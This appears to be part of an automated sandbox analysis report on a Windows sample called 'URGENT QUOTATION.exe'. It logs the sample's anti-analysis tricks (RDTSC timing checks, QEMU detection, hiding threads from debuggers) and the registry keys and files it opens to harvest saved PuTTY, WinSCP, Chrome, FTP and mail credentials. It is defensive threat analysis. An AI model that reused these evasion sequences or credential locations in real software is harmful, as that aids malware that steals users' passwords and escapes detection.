Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218127F push ebx; iretd	0_2_02181282
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218526F push ebx; iretd	0_2_02185272
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02186261 push ebx; iretd	0_2_02186262
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182A63 push ebx; iretd	0_2_02182A66
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218129D push ebx; iretd	0_2_0218129E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02180297 push ebx; iretd	0_2_0218029A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02180287 push ebx; iretd	0_2_0218028A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021802B9 push ebx; iretd	0_2_021802BA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182AAF push ebx; iretd	0_2_02182AB2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021802A3 push ebx; iretd	0_2_021802A6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02184AA5 push ebx; iretd	0_2_02184AA6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021852A5 push ebx; iretd	0_2_021852A6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021832DB push ebx; iretd	0_2_021832DE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021802D7 push ebx; iretd	0_2_021802DA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021842C9 push ebx; iretd	0_2_021842CA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021802CD push ebx; iretd	0_2_021802CE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021852CD push ebx; iretd	0_2_021852CE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021802C3 push ebx; iretd	0_2_021802C6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021852F9 push ebx; iretd	0_2_021852FA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021802F3 push ebx; iretd	0_2_021802F6

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: URGENT QUOTATION.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 000000000218524C second address: 000000000218524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 000000000056524C second address: 000000000056524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000000564C8B second address: 0000000000564C8B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor word ptr [eax+ebx], cx 0x0000000f cmp ebx, 0000033Dh 0x00000015 jnl 00007F270CB2D94Bh 0x00000017 add ebx, 02h 0x0000001a jmp 00007F270CB2D8FCh 0x0000001c jmp 00007F270CB2D946h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Code function: 0_2_021853EC rdtsc

0_2_021853EC

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6884	Thread sleep count: 91 > 30			Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6660	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Last function: Thread delayed

Source: URGENT QUOTATION.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Code function: 0_2_0218613D NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?

0_2_0218613D

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Code function: 0_2_021853EC rdtsc

0_2_021853EC

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Code function: 0_2_021830FC LdrInitializeThunk,

0_2_021830FC

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02182BF7 mov eax, dword ptr fs:[00000030h]	0_2_02182BF7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218182B mov eax, dword ptr fs:[00000030h]	0_2_0218182B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021846D2 mov eax, dword ptr fs:[00000030h]	0_2_021846D2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021846D7 mov eax, dword ptr fs:[00000030h]	0_2_021846D7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02181F7A mov eax, dword ptr fs:[00000030h]	0_2_02181F7A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02181F7D mov eax, dword ptr fs:[00000030h]	0_2_02181F7D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218578B mov eax, dword ptr fs:[00000030h]	0_2_0218578B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_0218578F mov eax, dword ptr fs:[00000030h]	0_2_0218578F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021857AE mov eax, dword ptr fs:[00000030h]	0_2_021857AE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02181FAF mov eax, dword ptr fs:[00000030h]	0_2_02181FAF
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021857C9 mov eax, dword ptr fs:[00000030h]	0_2_021857C9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_021857E7 mov eax, dword ptr fs:[00000030h]	0_2_021857E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02181D7E mov eax, dword ptr fs:[00000030h]	0_2_02181D7E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02184DA0 mov eax, dword ptr fs:[00000030h]	0_2_02184DA0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 0_2_02184DA3 mov eax, dword ptr fs:[00000030h]	0_2_02184DA3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00564DA3 mov eax, dword ptr fs:[00000030h]	4_2_00564DA3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00564DA0 mov eax, dword ptr fs:[00000030h]	4_2_00564DA0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005646D7 mov eax, dword ptr fs:[00000030h]	4_2_005646D7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005646D2 mov eax, dword ptr fs:[00000030h]	4_2_005646D2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005657C9 mov eax, dword ptr fs:[00000030h]	4_2_005657C9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562BF3 mov eax, dword ptr fs:[00000030h]	4_2_00562BF3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005657E7 mov eax, dword ptr fs:[00000030h]	4_2_005657E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_00562BE1 mov eax, dword ptr fs:[00000030h]	4_2_00562BE1
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_0056578F mov eax, dword ptr fs:[00000030h]	4_2_0056578F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_0056578B mov eax, dword ptr fs:[00000030h]	4_2_0056578B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Code function: 4_2_005657AE mov eax, dword ptr fs:[00000030h]	4_2_005657AE

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Code function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,

4_2_0056216A

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'

Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Code function: 0_2_02180701 cpuid

0_2_02180701

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\URGENT QUOTATION.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
